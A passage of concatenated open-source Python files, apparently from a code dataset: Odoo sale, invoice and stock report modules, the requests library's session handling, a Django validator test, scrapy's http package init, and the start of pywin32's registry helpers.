order = self.pool['sale.order'].read(cr, uid, values['order_id'], ['pricelist_id', 'partner_id', 'date_order', 'fiscal_position'], context=context)
defaults = self.product_id_change(cr, uid, [], order['pricelist_id'][0], values['product_id'],
qty=float(values.get('product_uom_qty', False)),
uom=values.get('product_uom', False),
qty_uos=float(values.get('product_uos_qty', False)),
uos=values.get('product_uos', False),
name=values.get('name', False),
partner_id=order['partner_id'][0],
date_order=order['date_order'],
fiscal_position=order['fiscal_position'][0] if order['fiscal_position'] else False,
flag=False, # Force name update
context=context
)['value']
if defaults.get('tax_id'):
defaults['tax_id'] = [[6, 0, defaults['tax_id']]]
values = dict(defaults, **values)
return super(sale_order_line, self).create(cr, uid, values, context=context)
def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, context=None):
if context is None:
context = {}
Partner = self.pool['res.partner']
ProductUom = self.pool['product.uom']
Product = self.pool['product.product']
ctx_product = dict(context)
partner = False
if partner_id:
partner = Partner.browse(cr, uid, partner_id, context=context)
ctx_product['lang'] = partner.lang
ctx_product['partner_id'] = partner_id
elif lang:
ctx_product['lang'] = lang
if not product:
            return {'value': {'th_weight': 0, 'product_uos_qty': qty},
                    'domain': {'product_uom': [], 'product_uos': []}}
if not date_order:
date_order = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
result = {}
product_obj = Product.browse(cr, uid, product, context=ctx_product)
uom2 = False
if uom:
uom2 = ProductUom.browse(cr, uid, uom, context=context)
if product_obj.uom_id.category_id.id != uom2.category_id.id:
uom = False
if uos:
if product_obj.uos_id:
uos2 = ProductUom.browse(cr, uid, uos, context=context)
if product_obj.uos_id.category_id.id != uos2.category_id.id:
uos = False
else:
uos = False
fpos = False
if not fiscal_position:
fpos = partner and partner.property_account_position or False
else:
fpos = self.pool['account.fiscal.position'].browse(cr, uid, fiscal_position)
        if update_tax:  # recompute the tax mapping (not needed when only the quantity has changed)
result['tax_id'] = self.pool['account.fiscal.position'].map_tax(cr, uid, fpos, product_obj.taxes_id)
if not flag:
result['name'] = Product.name_get(cr, uid, [product_obj.id], context=ctx_product)[0][1]
if product_obj.description_sale:
result['name'] += '\n'+product_obj.description_sale
domain = {}
if (not uom) and (not uos):
result['product_uom'] = product_obj.uom_id.id
if product_obj.uos_id:
result['product_uos'] = product_obj.uos_id.id
result['product_uos_qty'] = qty * product_obj.uos_coeff
uos_category_id = product_obj.uos_id.category_id.id
else:
result['product_uos'] = False
result['product_uos_qty'] = qty
uos_category_id = False
result['th_weight'] = qty * product_obj.weight
domain = {'product_uom':
[('category_id', '=', product_obj.uom_id.category_id.id)],
'product_uos':
[('category_id', '=', uos_category_id)]}
elif uos and not uom: # only happens if uom is False
result['product_uom'] = product_obj.uom_id and product_obj.uom_id.id
result['product_uom_qty'] = qty_uos / product_obj.uos_coeff
result['th_weight'] = result['product_uom_qty'] * product_obj.weight
elif uom: # whether uos is set or not
default_uom = product_obj.uom_id and product_obj.uom_id.id
q = ProductUom._compute_qty(cr, uid, uom, qty, default_uom)
if product_obj.uos_id:
result['product_uos'] = product_obj.uos_id.id
result['product_uos_qty'] = qty * product_obj.uos_coeff
else:
result['product_uos'] = False
result['product_uos_qty'] = qty
        result['th_weight'] = q * product_obj.weight  # weight computed on the quantity converted to the default UoM
if not uom2:
uom2 = product_obj.uom_id
if pricelist and partner_id:
price = self.pool['product.pricelist'].price_get(cr, uid, [pricelist],
product, qty or 1.0, partner_id, {
'uom': uom or result.get('product_uom'),
'date': date_order,
})[pricelist]
else:
price = Product.price_get(cr, uid, [product], ptype='list_price', context=ctx_product)[product] or False
result.update({'price_unit': price})
return {'value': result, 'domain': domain}
def product_uom_change(self, cursor, user, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, context=None):
context = context or {}
lang = lang or ('lang' in context and context['lang'])
if not uom:
return {'value': {'price_unit': 0.0, 'product_uom' : uom or False}}
return self.product_id_change(cursor, user, ids, pricelist, product,
qty=qty, uom=uom, qty_uos=qty_uos, uos=uos, name=name,
partner_id=partner_id, lang=lang, update_tax=update_tax,
date_order=date_order, context=context)
    def unlink(self, cr, uid, ids, context=None):
        """Allow deleting sales order lines only in the draft and cancel states."""
        if context is None:
            context = {}
for rec in self.browse(cr, uid, ids, context=context):
if rec.state not in ['draft', 'cancel']:
raise osv.except_osv(_('Invalid Action!'), _('Cannot delete a sales order line which is in state \'%s\'.') %(rec.state,))
return super(sale_order_line, self).unlink(cr, uid, ids, context=context)
class mail_compose_message(osv.Model):
_inherit = 'mail.compose.message'
def send_mail(self, cr, uid, ids, context=None):
context = context or {}
if context.get('default_model') == 'sale.order' and context.get('default_res_id') and context.get('mark_so_as_sent'):
context = dict(context, mail_post_autofollow=True)
self.pool.get('sale.order').signal_workflow(cr, uid, [context['default_res_id']], 'quotation_sent')
return super(mail_compose_message, self).send_mail(cr, uid, ids, context=context)
class account_invoice(osv.Model):
_inherit = 'account.invoice'
def _get_default_team_id(self, cr, uid, context=None):
""" Gives default team by checking if present in the context """
team_id = self._resolve_team_id_from_context(cr, uid, context=context) or False
return team_id
def _resolve_team_id_from_context(self, cr, uid, context=None):
""" Returns ID of team based on the value of 'team_id'
context key, or None if it cannot be resolved to a single
Sales Team.
"""
if context is None:
context = {}
        if isinstance(context.get('default_team_id'), (int, long)):
            return context.get('default_team_id')
if isinstance(context.get('default_team_id'), basestring):
team_ids = self.pool.get('crm.team').name_search(cr, uid, name=context['default_team_id'], context=context)
if len(team_ids) == 1:
return int(team_ids[0][0])
return None
_columns = {
'team_id': fields.many2one('crm.team', 'Sales Team', oldname='section_id'),
}
_defaults = {
'team_id': lambda self, cr, uid, c=None: self._get_default_team_id(cr, uid, context=c)
}
def confirm_paid(self, cr, uid, ids, context=None):
sale_order_obj = self.pool.get('sale.order')
res = super(account_invoice, self).confirm_paid(cr, uid, ids, context=context)
so_ids = sale_order_obj.search(cr, uid, [('invoice_ids', 'in', ids)], context=context)
for so_id in so_ids:
sale_order_obj.message_post(cr, uid, so_id, body=_("Invoice paid"), context=context)
return res
def unlink(self, cr, uid, ids, context=None):
""" Overwrite unlink method of account invoice to send a trigger to the sale workflow upon invoice deletion """
invoice_ids = self.search(cr, uid, [('id', 'in', ids), ('state', 'in', ['draft', 'cancel'])], context=context)
#if we can't cancel all invoices, do nothing
if len(invoice_ids) == len(ids):
            #Cancel the invoices before deleting them: if any sale order is associated with them,
            #this triggers the workflow that puts the sale order in an 'invoice exception' state
for id in ids:
workflow.trg_validate(uid, 'account.invoice', id, 'invoice_cancel', cr)
return super(account_invoice, self).unlink(cr, uid, ids, context=context)
class procurement_order(osv.osv):
_inherit = 'procurement.order'
_columns = {
'sale_line_id': fields.many2one('sale.order.line', string='Sale Order Line'),
}
def write(self, cr, uid, ids, vals, context=None):
if isinstance(ids, (int, long)):
ids = [ids]
res = super(procurement_order, self).write(cr, uid, ids, vals, context=context)
if vals.get('state') in ['done', 'cancel', 'exception']:
for proc in self.browse(cr, uid, ids, context=context):
if proc.sale_line_id and proc.sale_line_id.order_id:
order_id = proc.sale_line_id.order_id.id
if self.pool.get('sale.order').test_procurements_done(cr, uid, [order_id], context=context):
workflow.trg_validate(uid, 'sale.order', order_id, 'ship_end', cr)
if self.pool.get('sale.order').test_procurements_except(cr, uid, [order_id], context=context):
workflow.trg_validate(uid, 'sale.order', order_id, 'ship_except', cr)
return res
class product_product(osv.Model):
_inherit = 'product.product'
def _sales_count(self, cr, uid, ids, field_name, arg, context=None):
SaleOrderLine = self.pool['sale.order.line']
return {
            product_id: SaleOrderLine.search_count(cr, uid, [('product_id', '=', product_id)], context=context)
for product_id in ids
}
_columns = {
'sales_count': fields.function(_sales_count, string='# Sales', type='integer'),
}
class product_template(osv.Model):
_inherit = 'product.template'
def _sales_count(self, cr, uid, ids, field_name, arg, context=None):
res = dict.fromkeys(ids, 0)
for template in self.browse(cr, uid, ids, context=context):
res[template.id] = sum([p.sales_count for p in template.product_variant_ids])
return res
def action_view_sales(self, cr, uid, ids, context=None):
act_obj = self.pool.get('ir.actions.act_window')
mod_obj = self.pool.get('ir.model.data')
product_ids = []
for template in self.browse(cr, uid, ids, context=context):
product_ids += [x.id for x in template.product_variant_ids]
        result = mod_obj.xmlid_to_res_id(cr, uid, 'sale.action_order_line_product_tree', raise_if_not_found=True)
result = act_obj.read(cr, uid, [result], context=context)[0]
result['domain'] = "[('product_id','in',[" + ','.join(map(str, product_ids)) + "])]"
return result
_columns = {
'sales_count': fields.function(_sales_count, string='# Sales', type='integer'),
}
|
zchking/odoo | refs/heads/8.0 | addons/stock/report/report_stock.py | 376 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.sql import drop_view_if_exists
class report_stock_lines_date(osv.osv):
_name = "report.stock.lines.date"
_description = "Dates of Inventories and latest Moves"
_auto = False
_order = "date"
_columns = {
'id': fields.integer('Product Id', readonly=True),
'product_id': fields.many2one('product.product', 'Product', readonly=True, select=True),
'date': fields.datetime('Date of latest Inventory', readonly=True),
'move_date': fields.datetime('Date of latest Stock Move', readonly=True),
"active": fields.boolean("Active", readonly=True),
}
def init(self, cr):
drop_view_if_exists(cr, 'report_stock_lines_date')
cr.execute("""
create or replace view report_stock_lines_date as (
select
p.id as id,
p.id as product_id,
max(s.date) as date,
max(m.date) as move_date,
p.active as active
from
product_product p
left join (
stock_inventory_line l
inner join stock_inventory s on (l.inventory_id=s.id and s.state = 'done')
) on (p.id=l.product_id)
left join stock_move m on (m.product_id=p.id and m.state = 'done')
group by p.id
)""")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
YouRik/Received | refs/heads/master | qml/components/python/requests/sessions.py | 439 | # -*- coding: utf-8 -*-
"""
requests.session
~~~~~~~~~~~~~~~~
This module provides a Session object to manage and persist settings across
requests (cookies, auth, proxies).
"""
import os
from collections import Mapping
from datetime import datetime
from .auth import _basic_auth_str
from .compat import cookielib, OrderedDict, urljoin, urlparse
from .cookies import (
cookiejar_from_dict, extract_cookies_to_jar, RequestsCookieJar, merge_cookies)
from .models import Request, PreparedRequest, DEFAULT_REDIRECT_LIMIT
from .hooks import default_hooks, dispatch_hook
from .utils import to_key_val_list, default_headers, to_native_string
from .exceptions import (
TooManyRedirects, InvalidSchema, ChunkedEncodingError, ContentDecodingError)
from .packages.urllib3._collections import RecentlyUsedContainer
from .structures import CaseInsensitiveDict
from .adapters import HTTPAdapter
from .utils import (
requote_uri, get_environ_proxies, get_netrc_auth, should_bypass_proxies,
get_auth_from_url
)
from .status_codes import codes
# formerly defined here, reexposed here for backward compatibility
from .models import REDIRECT_STATI
REDIRECT_CACHE_SIZE = 1000
def merge_setting(request_setting, session_setting, dict_class=OrderedDict):
"""
Determines appropriate setting for a given request, taking into account the
explicit setting on that request, and the setting in the session. If a
setting is a dictionary, they will be merged together using `dict_class`
"""
if session_setting is None:
return request_setting
if request_setting is None:
return session_setting
# Bypass if not a dictionary (e.g. verify)
if not (
isinstance(session_setting, Mapping) and
isinstance(request_setting, Mapping)
):
return request_setting
merged_setting = dict_class(to_key_val_list(session_setting))
merged_setting.update(to_key_val_list(request_setting))
    # Remove keys that are set to None. Collect the keys first so the mapping
    # is not mutated while iterating, and so the result stays an instance of
    # dict_class instead of degrading to a plain dict.
    none_keys = [k for (k, v) in merged_setting.items() if v is None]
    for key in none_keys:
        del merged_setting[key]
return merged_setting
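# Illustration of merge_setting() semantics (comment only, not part of the
# upstream API): request-level values override session-level ones, and an
# explicit None removes an inherited key from the merged result.
#
#     >>> merge_setting({'b': None, 'c': 3}, {'a': 1, 'b': 2})
#     # -> OrderedDict holding {'a': 1, 'c': 3}; 'b' is dropped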
def merge_hooks(request_hooks, session_hooks, dict_class=OrderedDict):
"""
Properly merges both requests and session hooks.
This is necessary because when request_hooks == {'response': []}, the
merge breaks Session hooks entirely.
"""
if session_hooks is None or session_hooks.get('response') == []:
return request_hooks
if request_hooks is None or request_hooks.get('response') == []:
return session_hooks
return merge_setting(request_hooks, session_hooks, dict_class)
class SessionRedirectMixin(object):
def resolve_redirects(self, resp, req, stream=False, timeout=None,
verify=True, cert=None, proxies=None, **adapter_kwargs):
"""Receives a Response. Returns a generator of Responses."""
i = 0
hist = [] # keep track of history
while resp.is_redirect:
prepared_request = req.copy()
if i > 0:
# Update history and keep track of redirects.
hist.append(resp)
new_hist = list(hist)
resp.history = new_hist
try:
resp.content # Consume socket so it can be released
except (ChunkedEncodingError, ContentDecodingError, RuntimeError):
resp.raw.read(decode_content=False)
if i >= self.max_redirects:
raise TooManyRedirects('Exceeded %s redirects.' % self.max_redirects)
# Release the connection back into the pool.
resp.close()
url = resp.headers['location']
method = req.method
# Handle redirection without scheme (see: RFC 1808 Section 4)
if url.startswith('//'):
parsed_rurl = urlparse(resp.url)
url = '%s:%s' % (parsed_rurl.scheme, url)
# The scheme should be lower case...
parsed = urlparse(url)
url = parsed.geturl()
# Facilitate relative 'location' headers, as allowed by RFC 7231.
# (e.g. '/path/to/resource' instead of 'http://domain.tld/path/to/resource')
# Compliant with RFC3986, we percent encode the url.
if not parsed.netloc:
url = urljoin(resp.url, requote_uri(url))
else:
url = requote_uri(url)
prepared_request.url = to_native_string(url)
# Cache the url, unless it redirects to itself.
if resp.is_permanent_redirect and req.url != prepared_request.url:
self.redirect_cache[req.url] = prepared_request.url
# http://tools.ietf.org/html/rfc7231#section-6.4.4
if (resp.status_code == codes.see_other and
method != 'HEAD'):
method = 'GET'
# Do what the browsers do, despite standards...
# First, turn 302s into GETs.
if resp.status_code == codes.found and method != 'HEAD':
method = 'GET'
# Second, if a POST is responded to with a 301, turn it into a GET.
# This bizarre behaviour is explained in Issue 1704.
if resp.status_code == codes.moved and method == 'POST':
method = 'GET'
prepared_request.method = method
# https://github.com/kennethreitz/requests/issues/1084
if resp.status_code not in (codes.temporary_redirect, codes.permanent_redirect):
if 'Content-Length' in prepared_request.headers:
del prepared_request.headers['Content-Length']
prepared_request.body = None
headers = prepared_request.headers
try:
del headers['Cookie']
except KeyError:
pass
# Extract any cookies sent on the response to the cookiejar
# in the new request. Because we've mutated our copied prepared
# request, use the old one that we haven't yet touched.
extract_cookies_to_jar(prepared_request._cookies, req, resp.raw)
prepared_request._cookies.update(self.cookies)
prepared_request.prepare_cookies(prepared_request._cookies)
# Rebuild auth and proxy information.
proxies = self.rebuild_proxies(prepared_request, proxies)
self.rebuild_auth(prepared_request, resp)
# Override the original request.
req = prepared_request
resp = self.send(
req,
stream=stream,
timeout=timeout,
verify=verify,
cert=cert,
proxies=proxies,
allow_redirects=False,
**adapter_kwargs
)
extract_cookies_to_jar(self.cookies, prepared_request, resp.raw)
i += 1
yield resp
def rebuild_auth(self, prepared_request, response):
"""
When being redirected we may want to strip authentication from the
request to avoid leaking credentials. This method intelligently removes
and reapplies authentication where possible to avoid credential loss.
"""
headers = prepared_request.headers
url = prepared_request.url
if 'Authorization' in headers:
# If we get redirected to a new host, we should strip out any
# authentication headers.
original_parsed = urlparse(response.request.url)
redirect_parsed = urlparse(url)
if (original_parsed.hostname != redirect_parsed.hostname):
del headers['Authorization']
# .netrc might have more auth for us on our new host.
new_auth = get_netrc_auth(url) if self.trust_env else None
if new_auth is not None:
prepared_request.prepare_auth(new_auth)
return
def rebuild_proxies(self, prepared_request, proxies):
"""
This method re-evaluates the proxy configuration by considering the
environment variables. If we are redirected to a URL covered by
NO_PROXY, we strip the proxy configuration. Otherwise, we set missing
proxy keys for this URL (in case they were stripped by a previous
redirect).
This method also replaces the Proxy-Authorization header where
necessary.
"""
headers = prepared_request.headers
url = prepared_request.url
scheme = urlparse(url).scheme
new_proxies = proxies.copy() if proxies is not None else {}
if self.trust_env and not should_bypass_proxies(url):
environ_proxies = get_environ_proxies(url)
proxy = environ_proxies.get(scheme)
if proxy:
new_proxies.setdefault(scheme, environ_proxies[scheme])
if 'Proxy-Authorization' in headers:
del headers['Proxy-Authorization']
try:
username, password = get_auth_from_url(new_proxies[scheme])
except KeyError:
username, password = None, None
if username and password:
headers['Proxy-Authorization'] = _basic_auth_str(username, password)
return new_proxies
class Session(SessionRedirectMixin):
"""A Requests session.
Provides cookie persistence, connection-pooling, and configuration.
Basic Usage::
>>> import requests
>>> s = requests.Session()
>>> s.get('http://httpbin.org/get')
      <Response [200]>
"""
__attrs__ = [
'headers', 'cookies', 'auth', 'proxies', 'hooks', 'params', 'verify',
'cert', 'prefetch', 'adapters', 'stream', 'trust_env',
'max_redirects',
]
def __init__(self):
#: A case-insensitive dictionary of headers to be sent on each
#: :class:`Request <Request>` sent from this
#: :class:`Session <Session>`.
self.headers = default_headers()
#: Default Authentication tuple or object to attach to
#: :class:`Request <Request>`.
self.auth = None
#: Dictionary mapping protocol to the URL of the proxy (e.g.
#: {'http': 'foo.bar:3128'}) to be used on each
#: :class:`Request <Request>`.
self.proxies = {}
#: Event-handling hooks.
self.hooks = default_hooks()
#: Dictionary of querystring data to attach to each
#: :class:`Request <Request>`. The dictionary values may be lists for
#: representing multivalued query parameters.
self.params = {}
#: Stream response content default.
self.stream = False
#: SSL Verification default.
self.verify = True
#: SSL certificate default.
self.cert = None
#: Maximum number of redirects allowed. If the request exceeds this
#: limit, a :class:`TooManyRedirects` exception is raised.
self.max_redirects = DEFAULT_REDIRECT_LIMIT
#: Should we trust the environment?
self.trust_env = True
#: A CookieJar containing all currently outstanding cookies set on this
#: session. By default it is a
#: :class:`RequestsCookieJar <requests.cookies.RequestsCookieJar>`, but
#: may be any other ``cookielib.CookieJar`` compatible object.
self.cookies = cookiejar_from_dict({})
# Default connection adapters.
self.adapters = OrderedDict()
self.mount('https://', HTTPAdapter())
self.mount('http://', HTTPAdapter())
# Only store 1000 redirects to prevent using infinite memory
self.redirect_cache = RecentlyUsedContainer(REDIRECT_CACHE_SIZE)
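    # Illustrative note: mount() registers adapters by URL prefix and the
    # longest matching prefix wins, so a transport adapter can be scoped to a
    # single host (the host below is a placeholder):
    #
    #     s = Session()
    #     s.mount('https://api.example.com/', HTTPAdapter(max_retries=3))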
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
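    # Thanks to __enter__/__exit__ above, a Session can be used as a context
    # manager so its adapters are closed deterministically (URL illustrative):
    #
    #     with Session() as s:
    #         resp = s.get('http://httpbin.org/get', timeout=5)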
def prepare_request(self, request):
"""Constructs a :class:`PreparedRequest <PreparedRequest>` for
transmission and returns it. The :class:`PreparedRequest` has settings
merged from the :class:`Request <Request>` instance and those of the
:class:`Session`.
:param request: :class:`Request` instance to prepare with this
session's settings.
"""
cookies = request.cookies or {}
# Bootstrap CookieJar.
if not isinstance(cookies, cookielib.CookieJar):
cookies = cookiejar_from_dict(cookies)
# Merge with session cookies
merged_cookies = merge_cookies(
merge_cookies(RequestsCookieJar(), self.cookies), cookies)
# Set environment's basic authentication if not explicitly set.
auth = request.auth
if self.trust_env and not auth and not self.auth:
auth = get_netrc_auth(request.url)
p = PreparedRequest()
p.prepare(
method=request.method.upper(),
url=request.url,
files=request.files,
data=request.data,
json=request.json,
headers=merge_setting(request.headers, self.headers, dict_class=CaseInsensitiveDict),
params=merge_setting(request.params, self.params),
auth=merge_setting(auth, self.auth),
cookies=merged_cookies,
hooks=merge_hooks(request.hooks, self.hooks),
)
return p
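    # Sketch of the prepared-request flow enabled by this method (comment
    # only; the URL is illustrative). Request and PreparedRequest are the
    # classes imported at the top of this module:
    #
    #     s = Session()
    #     req = Request('GET', 'http://httpbin.org/get', params={'q': 'x'})
    #     prep = s.prepare_request(req)  # session headers/cookies/auth merged in
    #     resp = s.send(prep, timeout=5)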
def request(self, method, url,
params=None,
data=None,
headers=None,
cookies=None,
files=None,
auth=None,
timeout=None,
allow_redirects=True,
proxies=None,
hooks=None,
stream=None,
verify=None,
cert=None,
json=None):
"""Constructs a :class:`Request <Request>`, prepares it and sends it.
Returns :class:`Response <Response>` object.
:param method: method for the new :class:`Request` object.
:param url: URL for the new :class:`Request` object.
:param params: (optional) Dictionary or bytes to be sent in the query
string for the :class:`Request`.
:param data: (optional) Dictionary or bytes to send in the body of the
:class:`Request`.
:param json: (optional) json to send in the body of the
:class:`Request`.
:param headers: (optional) Dictionary of HTTP Headers to send with the
:class:`Request`.
:param cookies: (optional) Dict or CookieJar object to send with the
:class:`Request`.
:param files: (optional) Dictionary of ``'filename': file-like-objects``
for multipart encoding upload.
:param auth: (optional) Auth tuple or callable to enable
Basic/Digest/Custom HTTP Auth.
:param timeout: (optional) How long to wait for the server to send
data before giving up, as a float, or a (`connect timeout, read
timeout <user/advanced.html#timeouts>`_) tuple.
:type timeout: float or tuple
:param allow_redirects: (optional) Set to True by default.
:type allow_redirects: bool
:param proxies: (optional) Dictionary mapping protocol to the URL of
the proxy.
:param stream: (optional) whether to immediately download the response
content. Defaults to ``False``.
:param verify: (optional) if ``True``, the SSL cert will be verified.
A CA_BUNDLE path can also be provided.
:param cert: (optional) if String, path to ssl client cert file (.pem).
If Tuple, ('cert', 'key') pair.
"""
method = to_native_string(method)
# Create the Request.
req = Request(
method = method.upper(),
url = url,
headers = headers,
files = files,
data = data or {},
json = json,
params = params or {},
auth = auth,
cookies = cookies,
hooks = hooks,
)
prep = self.prepare_request(req)
proxies = proxies or {}
settings = self.merge_environment_settings(
prep.url, proxies, stream, verify, cert
)
# Send the request.
send_kwargs = {
'timeout': timeout,
'allow_redirects': allow_redirects,
}
send_kwargs.update(settings)
resp = self.send(prep, **send_kwargs)
return resp
def get(self, url, **kwargs):
"""Sends a GET request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
kwargs.setdefault('allow_redirects', True)
return self.request('GET', url, **kwargs)
def options(self, url, **kwargs):
"""Sends a OPTIONS request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
kwargs.setdefault('allow_redirects', True)
return self.request('OPTIONS', url, **kwargs)
def head(self, url, **kwargs):
"""Sends a HEAD request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
kwargs.setdefault('allow_redirects', False)
return self.request('HEAD', url, **kwargs)
def post(self, url, data=None, json=None, **kwargs):
"""Sends a POST request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`.
:param json: (optional) json to send in the body of the :class:`Request`.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
return self.request('POST', url, data=data, json=json, **kwargs)
def put(self, url, data=None, **kwargs):
"""Sends a PUT request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
return self.request('PUT', url, data=data, **kwargs)
def patch(self, url, data=None, **kwargs):
"""Sends a PATCH request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
return self.request('PATCH', url, data=data, **kwargs)
def delete(self, url, **kwargs):
"""Sends a DELETE request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
return self.request('DELETE', url, **kwargs)
def send(self, request, **kwargs):
"""Send a given PreparedRequest."""
# Set defaults that the hooks can utilize to ensure they always have
# the correct parameters to reproduce the previous request.
kwargs.setdefault('stream', self.stream)
kwargs.setdefault('verify', self.verify)
kwargs.setdefault('cert', self.cert)
kwargs.setdefault('proxies', self.proxies)
# It's possible that users might accidentally send a Request object.
# Guard against that specific failure case.
if not isinstance(request, PreparedRequest):
raise ValueError('You can only send PreparedRequests.')
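        # Rewrite the URL through the permanent-redirect cache, tracking the
        # URLs already seen so a cached redirect loop cannot spin forever.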
checked_urls = set()
while request.url in self.redirect_cache:
checked_urls.add(request.url)
new_url = self.redirect_cache.get(request.url)
if new_url in checked_urls:
break
request.url = new_url
# Set up variables needed for resolve_redirects and dispatching of hooks
allow_redirects = kwargs.pop('allow_redirects', True)
stream = kwargs.get('stream')
hooks = request.hooks
# Get the appropriate adapter to use
adapter = self.get_adapter(url=request.url)
# Start time (approximately) of the request
start = datetime.utcnow()
# Send the request
r = adapter.send(request, **kwargs)
# Total elapsed time of the request (approximately)
r.elapsed = datetime.utcnow() - start
# Response manipulation hooks
r = dispatch_hook('response', hooks, r, **kwargs)
# Persist cookies
if r.history:
# If the hooks create history then we want those cookies too
for resp in r.history:
extract_cookies_to_jar(self.cookies, resp.request, resp.raw)
extract_cookies_to_jar(self.cookies, request, r.raw)
# Redirect resolving generator.
gen = self.resolve_redirects(r, request, **kwargs)
# Resolve redirects if allowed.
history = [resp for resp in gen] if allow_redirects else []
# Shuffle things around if there's history.
if history:
# Insert the first (original) request at the start
history.insert(0, r)
# Get the last request made
r = history.pop()
r.history = history
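        # Touching .content below consumes the body so the underlying
        # connection can be released back to the pool.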
if not stream:
r.content
return r
def merge_environment_settings(self, url, proxies, stream, verify, cert):
"""Check the environment and merge it with some settings."""
# Gather clues from the surrounding environment.
if self.trust_env:
# Set environment's proxies.
env_proxies = get_environ_proxies(url) or {}
for (k, v) in env_proxies.items():
proxies.setdefault(k, v)
# Look for requests environment configuration and be compatible
# with cURL.
if verify is True or verify is None:
verify = (os.environ.get('REQUESTS_CA_BUNDLE') or
os.environ.get('CURL_CA_BUNDLE'))
# Merge all the kwargs.
proxies = merge_setting(proxies, self.proxies)
stream = merge_setting(stream, self.stream)
verify = merge_setting(verify, self.verify)
cert = merge_setting(cert, self.cert)
return {'verify': verify, 'proxies': proxies, 'stream': stream,
'cert': cert}
def get_adapter(self, url):
"""Returns the appropriate connnection adapter for the given URL."""
for (prefix, adapter) in self.adapters.items():
if url.lower().startswith(prefix):
return adapter
# Nothing matches :-/
raise InvalidSchema("No connection adapters were found for '%s'" % url)
def close(self):
"""Closes all adapters and as such the session"""
for v in self.adapters.values():
v.close()
def mount(self, prefix, adapter):
"""Registers a connection adapter to a prefix.
Adapters are sorted in descending order by key length."""
self.adapters[prefix] = adapter
keys_to_move = [k for k in self.adapters if len(k) < len(prefix)]
for key in keys_to_move:
self.adapters[key] = self.adapters.pop(key)
def __getstate__(self):
state = dict((attr, getattr(self, attr, None)) for attr in self.__attrs__)
state['redirect_cache'] = dict(self.redirect_cache)
return state
def __setstate__(self, state):
redirect_cache = state.pop('redirect_cache', {})
for attr, value in state.items():
setattr(self, attr, value)
self.redirect_cache = RecentlyUsedContainer(REDIRECT_CACHE_SIZE)
for redirect, to in redirect_cache.items():
self.redirect_cache[redirect] = to
def session():
"""Returns a :class:`Session` for context-management."""
return Session()
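# A minimal usage sketch (illustrative addition, not part of the original
# module); the URL below is hypothetical.
def _example_usage():  # pragma: no cover
    with session() as s:
        resp = s.get('http://example.com/resource', timeout=5)
        return resp.status_code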
|
rahul67/hue | refs/heads/master | desktop/core/ext-py/Django-1.6.10/tests/validation/test_validators.py | 118 | from __future__ import absolute_import, unicode_literals
from . import ValidationTestCase
from .models import ModelToValidate
class TestModelsWithValidators(ValidationTestCase):
def test_custom_validator_passes_for_correct_value(self):
mtv = ModelToValidate(number=10, name='Some Name', f_with_custom_validator=42)
self.assertEqual(None, mtv.full_clean())
def test_custom_validator_raises_error_for_incorrect_value(self):
mtv = ModelToValidate(number=10, name='Some Name', f_with_custom_validator=12)
self.assertFailsValidation(mtv.full_clean, ['f_with_custom_validator'])
self.assertFieldFailsValidationWithMessage(
mtv.full_clean,
'f_with_custom_validator',
['This is not the answer to life, universe and everything!']
)
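# Illustrative sketch (not part of the original tests): the custom validator
# assumed to be attached to ModelToValidate.f_with_custom_validator could look
# like this; the message mirrors the assertion above.
from django.core.exceptions import ValidationError

def validate_answer_to_universe(value):
    if value != 42:
        raise ValidationError(
            'This is not the answer to life, universe and everything!')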
|
liyy7/scrapy | refs/heads/master | scrapy/http/__init__.py | 207 | """
Module containing all HTTP related classes
Use this module (instead of the more specific ones) when importing Headers,
Request and Response outside this module.
"""
from scrapy.http.headers import Headers
from scrapy.http.request import Request
from scrapy.http.request.form import FormRequest
from scrapy.http.request.rpc import XmlRpcRequest
from scrapy.http.response import Response
from scrapy.http.response.html import HtmlResponse
from scrapy.http.response.xml import XmlResponse
from scrapy.http.response.text import TextResponse
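# For example (illustrative): ``from scrapy.http import Request, HtmlResponse``
# rather than importing the same classes from their individual submodules.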
|
alanjw/GreenOpenERP-Win-X86 | refs/heads/7.0 | python/Lib/site-packages/win32/lib/regutil.py | 5 | # Some registry helpers.
import win32api
import win32con
import sys
import os
error = "Registry utility error"
# A .py file has a CLSID associated with it (why? - dunno!)
CLSIDPyFile = "{b51df050-06ae-11cf-ad3b-524153480001}"
RegistryIDPyFile = "Python.File" # The registry "file type" of a .py file
RegistryIDPycFile = "Python.CompiledFile" # The registry "file type" of a .pyc file
def BuildDefaultPythonKey():
